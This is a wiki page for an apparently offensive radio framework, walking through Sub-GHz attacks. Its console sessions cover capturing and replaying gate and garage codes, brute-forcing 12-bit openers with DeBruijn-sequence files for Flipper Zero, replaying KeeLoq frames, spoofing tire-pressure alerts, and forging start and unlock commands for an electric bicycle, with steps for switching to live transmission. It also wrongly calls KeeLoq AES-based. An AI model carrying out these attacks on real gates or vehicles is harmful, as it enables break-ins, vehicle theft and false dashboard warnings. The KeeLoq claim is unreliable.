-
Notifications
You must be signed in to change notification settings - Fork 2
SubGHz Attacks
André Henrique edited this page Jun 8, 2026
·
1 revision
Legal Warning: Transmitting on Sub-GHz bands without a license is illegal in most jurisdictions. Use only on your own equipment, inside RF-shielded enclosures, or in authorized red team engagements. Garage and gate spoofing without explicit property owner consent is a criminal offense.
| Component | Purpose | Required For |
|---|---|---|
| HackRF One | TX+RX 1 MHz-6 GHz | Replay, bruteforce, jamming |
| RTL-SDR | RX only (passive) | TPMS decode, signal analysis |
| CC1101 + ESP32 | TX+RX 300-928 MHz (budget) | Static code attacks |
| Flipper Zero / Bruce | Sub-GHz TX+RX | .sub file replay |
| Protocol | Bits | Frequency | Security | Module |
|---|---|---|---|---|
| EV1527 | 24 | 433 MHz | None | subghz/static_code_replay |
| Princeton / PT2262 | 24 | 315/433 MHz | None | subghz/static_code_replay |
| CAME | 12 | 303-868 MHz | None | subghz/debruijn_bruteforce |
| NICE Flo | 12 | 433/868 MHz | None | subghz/debruijn_bruteforce |
| Holtek HT12X | 12 | 315/433/868/915 MHz | None | subghz/debruijn_bruteforce |
| Chamberlain | 9 | 300/315/390 MHz | None | subghz/debruijn_bruteforce |
| KeeLoq | 64 | 433/868 MHz | AES rolling code | subghz/keeloq_* |
| TPMS Toyota | var | 315 MHz | CRC only | subghz/tpms/tpms_decoder |
| TPMS Renault | var | 433 MHz | CRC only | subghz/tpms/tpms_decoder |
| EV1527 vehicle | 24 | 433 MHz | None | subghz/ev1527_vehicle_cve_2025_70994 |
| Module | Description |
|---|---|
static_code_replay |
EV1527/Princeton/CAME/NICE/Holtek/Chamberlain static code replay |
debruijn_bruteforce |
DeBruijn sequence bruteforce for 12-bit garage door protocols |
keeloq_decoder |
KeeLoq rolling code frame decoder and analyzer |
keeloq_replay |
KeeLoq rolling code replay within counter window |
ev1527_vehicle_cve_2025_70994 |
CVE-2025-70994 - EV1527 vehicle remote keyless entry replay |
subghz_jammer |
Sub-GHz selective jammer (authorized testing only) |
br_gate_scanner |
Brazilian gate/garage protocol scanner and recorder |
tpms/tpms_decoder |
TPMS tire pressure sensor passive decoder (RTL-SDR) |
tpms/tpms_spoof |
TPMS spoofed tire pressure alert injection |
tools/ook_analyzer |
OOK signal analyzer: preamble, bit timing, protocol identification |
For protocols with no rolling code protection (EV1527, Princeton, etc.), a captured signal can be replayed indefinitely.
wxf > use generic/subghz/static_code_replay
wxf (StaticCodeReplay) > show options
Options:
PROTOCOL EV1527 Protocol (EV1527, Princeton, CAME, NICE, Holtek, Chamberlain)
CODE 0x000000 24-bit code to transmit (0x = hex, decimal accepted)
FREQUENCY 433.92 Frequency in MHz
INTERFACE hackrf Hardware interface (hackrf, cc1101, simulate)
REPEATS 3 Number of transmissions
SIMULATE true Simulate without transmitting
wxf (StaticCodeReplay) > set PROTOCOL EV1527
wxf (StaticCodeReplay) > set CODE 0xA3F21B
wxf (StaticCodeReplay) > set FREQUENCY 433.92
wxf (StaticCodeReplay) > set SIMULATE true
wxf (StaticCodeReplay) > run
[SIMULATE] EV1527 code: 0xA3F21B (10739227)
[SIMULATE] Frequency: 433.92 MHz | Bit time: 333 us
[SIMULATE] Preamble: 32 periods LOW | Data: 24 bits (Manchester-like)
[SIMULATE] OOK pulse sequence (24 bits):
[SIMULATE] 101000001010000010100010 (hex: A3F21B)
[SIMULATE] Would transmit 3x via HackRF One at 433.92 MHz
[!] Set SIMULATE=false and INTERFACE=hackrf to transmit live
[!] PREREQ: hackrf_transfer installed + HackRF One connected
To capture a signal first using RTL-SDR and then decode it:
wxf > use generic/subghz/tools/ook_analyzer
wxf (OOKAnalyzer) > set INTERFACE rtlsdr
wxf (OOKAnalyzer) > set FREQUENCY 433.92
wxf (OOKAnalyzer) > run
[*] Listening on 433.92 MHz via RTL-SDR...
[*] Signal detected! OOK burst captured.
[+] Protocol guess: EV1527 (24-bit, 333 us/bit)
[+] Preamble: 32x LOW detected
[+] Decoded bits: 101000001010000010100010
[+] Hex code: 0xA3F21B
[+] Saved: /tmp/ook_capture_433920000.sub
For 12-bit fixed-code protocols (CAME, NICE, Holtek), a DeBruijn sequence tests all 4096 possible codes efficiently. The sequence is designed so that every possible n-bit window appears exactly once, minimizing transmission time.
wxf > use generic/subghz/debruijn_bruteforce
wxf (DeBruijn) > show options
Options:
PROTOCOL CAME Protocol (CAME, NICE, Holtek, Chamberlain)
FREQUENCY 433.92 Frequency in MHz
OUTPUT_SUB /tmp/out.sub Output .sub file path (Flipper/Bruce compatible)
SIMULATE true Preview without generating file
wxf (DeBruijn) > set PROTOCOL CAME
wxf (DeBruijn) > set FREQUENCY 433.92
wxf (DeBruijn) > set OUTPUT_SUB /tmp/came_brute.sub
wxf (DeBruijn) > run
[*] Generating DeBruijn sequence for CAME 12-bit at 433.92 MHz
[*] Protocol timing: TE=320us | Footer: -11520us
[*] Total unique codes: 4,096
[*] Estimated TX time at 320us/bit x 12 bits x 3 repeats: ~4.8 minutes
[+] Generated: /tmp/came_brute.sub (Flipper Zero / Bruce compatible)
[*] File contains 4,096 RAW_Data entries
[*] To use on Flipper Zero:
Sub-GHz -> Saved -> came_brute.sub -> Send
[*] To use on Bruce firmware (M5Stack/Lilygo):
RF -> Custom SubGhz -> Load File
[*] Supported protocols and estimated times:
CAME 303/307/315/330/433/868 MHz - ~4.8 min
NICE 433/868 MHz - ~10.5 min
Holtek 315/433/868/915 MHz - ~6.5 min
Chamberlain 300/315/390 MHz - ~2.1 min
KeeLoq is a 64-bit rolling code system used by many automotive and garage door manufacturers. The 64-bit frame is divided into a FIX portion (static serial number and button code) and a HOP portion (AES-encrypted counter). Replay attacks succeed only within the counter acceptance window (typically +/-256 from the last accepted code).
wxf > use generic/subghz/keeloq_decoder
wxf (KeeLoqDecoder) > set CAPTURE_FILE /tmp/captured_signal.sub
wxf (KeeLoqDecoder) > run
[*] Analyzing: /tmp/captured_signal.sub
[+] Protocol: KeeLoq (64-bit rolling code)
[+] FIX portion (static):
Serial number: 0xA1B2C3D4
Button code: 0x3 (button 3 / unlock)
Status bits: 0b0001
[+] HOP portion (encrypted): 0xE5F60789
[!] Decryption requires manufacturer key
[*] Estimated manufacturer: CAME Space (based on FIX structure)
[*] Counter window: typical +/-256 from last accepted code
wxf > use generic/subghz/keeloq_replay
wxf (KeeLoqReplay) > set CAPTURE_FILE /tmp/captured_signal.sub
wxf (KeeLoqReplay) > set SIMULATE true
wxf (KeeLoqReplay) > run
[SIMULATE] Would retransmit captured KeeLoq frame
[SIMULATE] FIX: 0xA1B2C3D4 | HOP: 0xE5F60789 | Counter: ~EC04
[SIMULATE] Window: EC04 to EC103 (+/-256)
[!] Replay succeeds only if counter is within window
[!] Set SIMULATE=false + INTERFACE=hackrf to transmit
[!] PREREQ: HackRF One + 433 MHz antenna + hackrf_transfer
TPMS (Tire Pressure Monitoring System) sensors broadcast pressure, temperature, and battery data on 315/433 MHz using FSK or OOK modulation. Most sensors use only a CRC for integrity - no authentication. A passive RTL-SDR can decode broadcasts; a HackRF can inject spoofed alerts.
wxf > use generic/subghz/tpms/tpms_decoder
wxf (TPMSDecoder) > set INTERFACE rtlsdr
wxf (TPMSDecoder) > set FREQUENCY 433.92
wxf (TPMSDecoder) > run
[*] Passive TPMS scan on 433.92 MHz (RTL-SDR)
[*] Waiting for sensor broadcasts...
[+] Sensor detected: ID=0xABCDE123 | Pressure=2.3 bar | Temp=22C | Battery=OK
[+] Sensor detected: ID=0xABCDE124 | Pressure=2.4 bar | Temp=22C | Battery=OK
[+] Sensor detected: ID=0xABCDE125 | Pressure=2.3 bar | Temp=21C | Battery=OK
[+] Sensor detected: ID=0xABCDE126 | Pressure=2.4 bar | Temp=21C | Battery=OK
^C
[*] Scan stopped. 4 sensors logged (likely 4-wheel vehicle).
[+] Saved to /tmp/tpms_scan_20260608.json
wxf > use generic/subghz/tpms/tpms_spoof
wxf (TPMSSpoof) > set TARGET_ID 0xABCDE123
wxf (TPMSSpoof) > set PRESSURE 0.5
wxf (TPMSSpoof) > set SIMULATE true
wxf (TPMSSpoof) > run
[SIMULATE] TPMS frame for sensor ID 0xABCDE123
[SIMULATE] Spoofed pressure: 0.5 bar (triggers LOW TIRE WARNING on dash)
[SIMULATE] Frequency: 433.92 MHz | Encoding: FSK diff Manchester
[SIMULATE] CRC: recalculated for spoofed payload
[SIMULATE] Would transmit continuously until Ctrl+C
[!] Set SIMULATE=false + INTERFACE=hackrf to inject
[!] PREREQ: HackRF One + 433 MHz antenna
[!] NOTE: Vehicle must be within ~10m for reliable injection
This CVE affects the Yadea T5 electric bicycle (2024+) and similar vehicles using static EV1527-based remote keyless entry. The vehicle uses a static 20-bit address in the EV1527 protocol. Any captured signal (including a bell ring) exposes the vehicle ID, allowing synthesis of a Start command.
wxf > use generic/subghz/ev1527_vehicle_cve_2025_70994
wxf (EV1527Vehicle) > show info
Name: EV1527 Vehicle Keyless Entry Bypass
CVE: CVE-2025-70994
CVSS: 7.3 (High)
Target: Yadea T5 Electric Bicycle (2024+), similar EV1527-based vehicles
Auth: None required
Status: Coordinated disclosure - CISA/CERT/CC - April 2026
Description:
The Yadea T5 uses a static 20-bit vehicle address in EV1527 protocol.
Any captured signal (including bell ring) exposes the vehicle ID.
Attacker synthesizes Start command: vehicle_id + 0x2 (start byte).
wxf (EV1527Vehicle) > set TARGET_ID 0xABCDE
wxf (EV1527Vehicle) > set COMMAND start
wxf (EV1527Vehicle) > set SIMULATE true
wxf (EV1527Vehicle) > run
[*] CVE-2025-70994: EV1527 Vehicle Start Spoof
[*] Vehicle ID (20 bits): 0xABCDE
[*] Command code: 0x2 (Start/Ignition)
[*] Full 24-bit frame: 0xABCDE2
[SIMULATE] OOK frame to transmit:
[SIMULATE] Preamble: LOW 31x TE (333us each) = 10.3ms
[SIMULATE] Data (24 bits): 10101011 11001101 11100010
[SIMULATE] Carrier: 433.92 MHz ASK/OOK
[SIMULATE] Repeats: 3x (standard EV1527 retransmit)
[!] Set SIMULATE=false to transmit (requires HackRF or CC1101)
[!] Affected: All Yadea T5 (2024+) with firmware < patch
[*] Disclosure: Coordinated with CISA and CERT/CC, April 2026
Supported commands for set COMMAND:
| Command | Code | Effect |
|---|---|---|
start |
0x2 | Start ignition / motor enable |
stop |
0x1 | Stop motor |
lock |
0x3 | Lock vehicle |
unlock |
0x4 | Unlock vehicle |
alarm |
0x5 | Trigger alarm / horn |
The br_gate_scanner module passively records garage door and gate signals for common protocols used in Brazil (PECCININ, RCG, Garen, JFL, AGL), outputting Flipper Zero .sub files.
wxf > use generic/subghz/br_gate_scanner
wxf (BRGateScanner) > set INTERFACE rtlsdr
wxf (BRGateScanner) > set SCAN_BANDS all
wxf (BRGateScanner) > set DURATION 60
wxf (BRGateScanner) > run
[*] Scanning Brazilian gate/garage protocols for 60s
[*] Bands: 433.92, 868.30, 315.00 MHz
[*] Listening...
[+] Signal at 433.92 MHz: EV1527-like (24-bit), code=0xF1E2D3
Brand guess: PECCININ PPA (EV1527 compatible)
Saved: /tmp/signal_433920000_F1E2D3.sub
[+] Signal at 433.92 MHz: NICE Flo (12-bit), code=0xA3B
Saved: /tmp/signal_nice_A3B.sub
[*] Scan complete. 2 signals captured.
wxf > use generic/subghz/tools/ook_analyzer
wxf (OOKAnalyzer) > set CAPTURE_FILE /tmp/mystery_signal.sub
wxf (OOKAnalyzer) > run
[*] Analyzing: /tmp/mystery_signal.sub
[+] Modulation: OOK (On-Off Keying)
[+] Carrier: 433.92 MHz
[+] Bit time (TE): 330-336 us -> 333 us nominal
[+] Preamble: 32 periods LOW (10.6ms)
[+] Data length: 24 bits
[+] Bit encoding: width modulation (short=0, long=1)
[+] Protocol match: EV1527 (confidence: 95%)
[+] Decoded code: 0xA3F21B
[+] Repeat count: 3
[+] Gap between repeats: 10ms
[*] Compatible modules:
use generic/subghz/static_code_replay
set CODE 0xA3F21B
set FREQUENCY 433.92
set PROTOCOL EV1527
# Install
sudo apt install hackrf
# Test connection
hackrf_info
# HackRF One found (firmware: 2023.01.1)
# Required for TX modules
export HACKRF_INSTALLED=1# Install
sudo apt install rtl-sdr python3-rtlsdr
# Test
rtl_test -t
# Found 1 device(s): Generic RTL2832U OEM
# Required for passive RX modules (TPMS, OOK analyzer)Connect CC1101 to ESP32 via SPI. Flash with custom WXF firmware or use generic/subghz/static_code_replay with INTERFACE=cc1101. See docs for wiring.
Related pages: Drone Security | Maritime Security | WIDS
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware